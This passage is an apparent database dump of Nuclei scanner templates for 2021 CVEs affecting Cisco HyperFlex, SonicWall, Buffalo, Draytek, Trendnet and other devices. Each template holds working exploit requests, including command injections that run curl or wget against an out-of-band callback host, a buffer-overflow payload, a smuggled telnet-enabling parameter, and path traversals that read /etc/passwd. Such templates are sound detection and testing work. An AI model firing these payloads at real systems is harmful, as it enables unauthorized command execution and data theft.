https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution\n - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-1497\n cwe-id: CWE-78\n epss-score: 0.97512\n epss-percentile: 0.99982\n cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\):*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: cisco\n product: hyperflex_hx_data_platform\n tags: cve,cve2021,cisco,rce,oast,kev,packetstorm\nvariables:\n cmd: 'curl http://{{interactsh-url}} -H \\\"User-Agent: {{useragent}}\\\"'\n payload: '123\",\"\"$6$$)); import os;os.system(\"{{cmd}}\");print(crypt.crypt(\"'\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /auth/change HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n username=root&password={{url_encode(payload)}}\n - |\n POST /auth HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n username=root&password={{url_encode(payload)}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a0047304502205bf03c53ef9c3e589285c61ece0c3f8d9ba380374319f9d6e77009202da15e95022100b2cc64f119929489719747070a86407765284ea6775591bd2dc826e977a54646:922c64590222798bb761d5b6d8e72950", "hash": "7a72affb7987a339b0e42d8498ac0f10", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825a" }, "name": "CVE-2021-1498.yaml", "content": "id: CVE-2021-1498\n\ninfo:\n name: Cisco HyperFlex HX Data Platform - Remote Command Execution\n author: gy741\n severity: 
critical\n description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1498\n - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html\n - https://twitter.com/Unit42_Intel/status/1402655493735206915\n - https://twitter.com/ptswarm/status/1390300625129201664\n - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution\n - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-1498\n cwe-id: CWE-78\n epss-score: 0.97512\n epss-percentile: 0.99982\n cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: hyperflex_hx_data_platform\n tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai\n\nhttp:\n - raw:\n - |\n POST /storfs-asup HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: status\n status:\n - 
200\n# digest: 490a0046304402205928b479b0e61672c4d2b20bdeae75d2dba2d325c94c7154aa53b8e88dfc65f202207c82f73333f8276f8f5eb140990b1b92acc361e69b4e1dd8fd134ce4a84b064e:922c64590222798bb761d5b6d8e72950", "hash": "1615044d26883c50aa0c8f8af273be50", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825b" }, "name": "CVE-2021-1499.yaml", "content": "id: CVE-2021-1499\n\ninfo:\n name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload\n author: gy741\n severity: medium\n description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.\n impact: |\n Allows an attacker to upload and execute arbitrary files on the target system\n remediation: |\n Apply the necessary security patches or updates provided by Cisco\n reference:\n - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz\n - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-1499\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-1499\n cwe-id: CWE-306\n epss-score: 0.9652\n epss-percentile: 0.99578\n cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: hyperflex_hx_data_platform\n tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco\n\nhttp:\n - raw:\n - |\n POST /upload HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Encoding: gzip, deflate\n Content-Type: multipart/form-data; 
boundary=---------------------------253855577425106594691130420583\n Origin: {{RootURL}}\n Referer: {{RootURL}}\n\n -----------------------------253855577425106594691130420583\n Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\n Content-Type: application/json\n\n MyPasswdNewData->/api/tomcat\n\n -----------------------------253855577425106594691130420583--\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{\"result\":'\n - '\"filename:'\n - '/tmp/passwd9'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e38f80c4ba37d6ad8f1e127a4526fd195044d8a0beb3acb9716a231adfcb0bb7022019e048850c00a33d4cb35452a239138bd55f8c2b6271a2efbbbca623cba5b449:922c64590222798bb761d5b6d8e72950", "hash": "8948b00ca226d0c9a7b480be4e6f5e20", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825c" }, "name": "CVE-2021-20031.yaml", "content": "id: CVE-2021-20031\n\ninfo:\n name: SonicWall SonicOS 7.0 - Open Redirect\n author: gy741\n severity: medium\n description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. 
and/or possibly redirect a user to a malicious site.\n remediation: |\n Apply the latest security patch or update provided by SonicWall to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50414\n - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019\n - http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20031\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20031\n cwe-id: CWE-601\n epss-score: 0.01202\n epss-percentile: 0.84903\n cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sonicwall\n product: sonicos\n google-query: inurl:\"auth.html\" intitle:\"SonicWall\"\n tags: cve,cve2021,sonicwall,redirect,edb,packetstorm\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{randstr}}.tld\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'https://{{randstr}}.tld/auth.html'\n - 'Please be patient as you are being re-directed'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a88f073b7af18401e8266c452e7918ef64d4ad02c5c4254fa02c8492c8d76b24022100efd86ff7c908c8cf283050af56d5e0a0d3ad3e0ccbf6e83fad3847d18c67d514:922c64590222798bb761d5b6d8e72950", "hash": "559fa63159002c7f8e131d47f42c8b50", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825d" }, "name": "CVE-2021-20038.yaml", "content": "id: CVE-2021-20038\n\ninfo:\n name: SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution\n author: dwisiswant0, jbaines-r7\n severity: critical\n description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. 
This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or crash the affected system.\n remediation: |\n Apply the latest security patch or update provided by SonicWall to mitigate this vulnerability.\n reference:\n - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis\n - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20038\n - https://github.com/jbaines-r7/badblood\n - https://github.com/Ostorlab/KEV\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20038\n cwe-id: CWE-787,CWE-121\n epss-score: 0.95823\n epss-percentile: 0.99394\n cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: sonicwall\n product: sma_200_firmware\n tags: cve2021,cve,overflow,rce,sonicwall,kev\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n prefix_addr:\n - \"%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf\" # stack's top address\n system_addr:\n - \"%08%b7%06%08\" # for 10.2.1.2-24sv\n - \"%64%b8%06%08\" # for 10.2.1.1-1[79]sv\n attack: clusterbomb\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 
4a0a00473045022100b49265d42322ef09c210c86e7f05e3852423926f090b97d3bcdd6bcea1d7778002200556aea3a7775b4e81ccfa40289681631bfa4b778f8405ee374816a699599029:922c64590222798bb761d5b6d8e72950", "hash": "5044bc1bd4df4cc3903d734a6d06bd3d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825e" }, "name": "CVE-2021-20090.yaml", "content": "id: CVE-2021-20090\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Path Traversal\n author: gy741\n severity: critical\n description: |\n Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20090\n - https://www.kb.cert.org/vuls/id/914124\n - https://www.secpod.com/blog/arcadyan-based-routers-and-modems-under-active-exploitation/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20090\n cwe-id: CWE-22\n epss-score: 0.97465\n epss-percentile: 0.99955\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 
'URLToken(cgi_path)'\n - 'pppoe'\n - 'wan'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009f2ac54d068e5549fd7eaf1335230f3f8bdad9d601c0edd791a9851e6d9511820221008e1bcf8ae00bf61371d0684a711c6136b439ef8ef90dc6d9f559231bce340961:922c64590222798bb761d5b6d8e72950", "hash": "1c7432ea2d7d12259474ea03b1940800", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825f" }, "name": "CVE-2021-20091.yaml", "content": "id: CVE-2021-20091\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Configuration File Injection\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.\n impact: |\n An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.\n reference:\n - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-20091\n epss-score: 0.00928\n epss-percentile: 0.81222\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve2021,cve,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n 
GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n POST /images/..%2fapply_abstract.cgi HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"/Success.htm\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n# digest: 4b0a00483046022100dd49a706de9b916f92684a08c80476589aa14b407bde15ee8a4cc56622060174022100d77abfdb0134802a565bbd5c593e458978e19bf0ff9973231988835c3199bfe8:922c64590222798bb761d5b6d8e72950", "hash": "b25de58988f3cb50e4140fff68bc88b7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308260" }, "name": "CVE-2021-20092.yaml", "content": "id: CVE-2021-20092\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Improper Access Control\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the access control issue.\n reference:\n - https://www.tenable.com/security/research/tra-2021-13\n - 
https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20092\n cwe-id: CWE-287\n epss-score: 0.01583\n epss-percentile: 0.87054\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve2021,cve,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\n Host: {{Hostname}}\n Cookie: lang=8; url=ping.html; mobile=false;\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/x-javascript\"\n\n - type: word\n words:\n - \"/*DEMO*/\"\n - \"addCfg(\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n# digest: 490a0046304402204a050931d97fb4bd96f5b79ea9e272dd12ddd010881090fa1fbe7d66bf8dba7502207114368dda3e6e1d7423ee40b0eac74d3bee7aa8ac6000c9ae2eac06ca1acd32:922c64590222798bb761d5b6d8e72950", "hash": "13c128d9cb3d2d250d6fdaa1103fe214", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308261" }, "name": "CVE-2021-20114.yaml", "content": "id: CVE-2021-20114\n\ninfo:\n name: TCExam <= 14.8.1 - Sensitive Information Exposure\n author: push4d\n severity: high\n description: When installed following the 
default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade TCExam to a version higher than 14.8.1 to mitigate the vulnerability.\n reference:\n - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20114\n - https://www.tenable.com/security/research/tra-2021-32\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20114\n cwe-id: CWE-425\n epss-score: 0.01409\n epss-percentile: 0.86167\n cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tecnick\n product: tcexam\n tags: cve,cve2021,tcexam,disclosure,exposure,tenable,tecnick\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cache/backup/\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Index of /cache/backup\"\n - \"Parent Directory\"\n - \".sql.gz\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220593509be71e4f3c4a93f5218c7615fc4b876c64259f2151d89a663d9d11aa510022100f6a0490be29ac53bcba0d368c4835cfaa80d384c4a9dc507896e7f02f69c17fe:922c64590222798bb761d5b6d8e72950", "hash": "674163c81f24711cb4eb410c68edb2d6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308262" }, "name": "CVE-2021-20123.yaml", "content": "id: CVE-2021-20123\n\ninfo:\n name: Draytek VigorConnect 1.6.0-B - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. 
An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B.\n reference:\n - https://www.tenable.com/security/research/tra-2021-42\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20123\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20123\n cwe-id: CWE-22\n epss-score: 0.03354\n epss-percentile: 0.91162\n cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: draytek\n product: vigorconnect\n shodan-query: http.html:\"VigorConnect\"\n tags: cve2021,cve,draytek,lfi,vigorconnect,tenable\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything\"\n - \"{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"for 16-bit app support\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022062fbdc0055a5e3028d6b0fc1cd8d72136f750008795a0f5fa47bed7b03f7d2ae0220630d19cd162113ec4c1fab558f6170e0f964f3b697b287d62f4807ed37a54c4e:922c64590222798bb761d5b6d8e72950", "hash": "acbe825e909af02a914b29dcaadf1ef8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf308263" }, "name": "CVE-2021-20124.yaml", "content": "id: CVE-2021-20124\n\ninfo:\n name: Draytek VigorConnect 6.0-B3 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3.\n reference:\n - https://www.tenable.com/security/research/tra-2021-42\n - https://www.draytek.com/products/vigorconnect/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20124\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20124\n cwe-id: CWE-22\n epss-score: 0.01331\n epss-percentile: 0.85744\n cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: draytek\n product: vigorconnect\n shodan-query: http.html:\"VigorConnect\"\n tags: cve2021,cve,draytek,lfi,vigorconnect,tenable\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n - \"for 16-bit app support\"\n condition: or\n\n - type: status\n status:\n - 200\n# 
digest: 490a0046304402201b3f1f755c121ccb9a251c16ad6e7453fc09afe729910ba0627eaa855d04e7f70220147595c2aad515d0ffa806be04849a7530d35e3b15e3b587f301e54c4b30f9da:922c64590222798bb761d5b6d8e72950", "hash": "bb0699809d20b6e9ca9de3135f8593c9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308264" }, "name": "CVE-2021-20137.yaml", "content": "id: CVE-2021-20137\n\ninfo:\n name: Gryphon Tower - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137\n - https://www.tenable.com/security/research/tra-2021-51\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20137\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20137\n cwe-id: CWE-79\n epss-score: 0.24456\n epss-percentile: 0.96515\n cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gryphonconnect\n product: gryphon_tower_firmware\n tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 
\"text/html\"\n\n - type: word\n part: body\n words:\n - 'onfocus=alert(document.domain) autofocus=1>'\n - 'Send Access Request URL'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f59adf2060e9bd5cd6778f48d141f1bd0ac128d97a8dde7e931d4f3135d0e887022100f9c874e8c0cc7c2e23d9bd5f892e66fb4e28e818ba92abb6ccc29c10c845173e:922c64590222798bb761d5b6d8e72950", "hash": "7d85f755fc411ee9368013474c037a55", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308265" }, "name": "CVE-2021-20150.yaml", "content": "id: CVE-2021-20150\n\ninfo:\n name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure\n author: gy741\n severity: medium\n description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.\n impact: |\n An attacker can obtain sensitive credentials, leading to unauthorized access to the router.\n remediation: |\n Update the router firmware to the latest version to fix the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-54\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20150\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-20150\n cwe-id: CWE-306\n epss-score: 0.19434\n epss-percentile: 0.95837\n cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: trendnet\n product: tew-827dru_firmware\n shodan-query: http.html:\"TEW-827DRU\"\n tags: cve2021,cve,disclosure,router,tenable,trendnet\n\nhttp:\n - raw:\n - |\n POST /apply_sec.cgi HTTP/1.1\n Host: {{Hostname}}\n\n action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'ftp_username'\n - 'ftp_password'\n - 
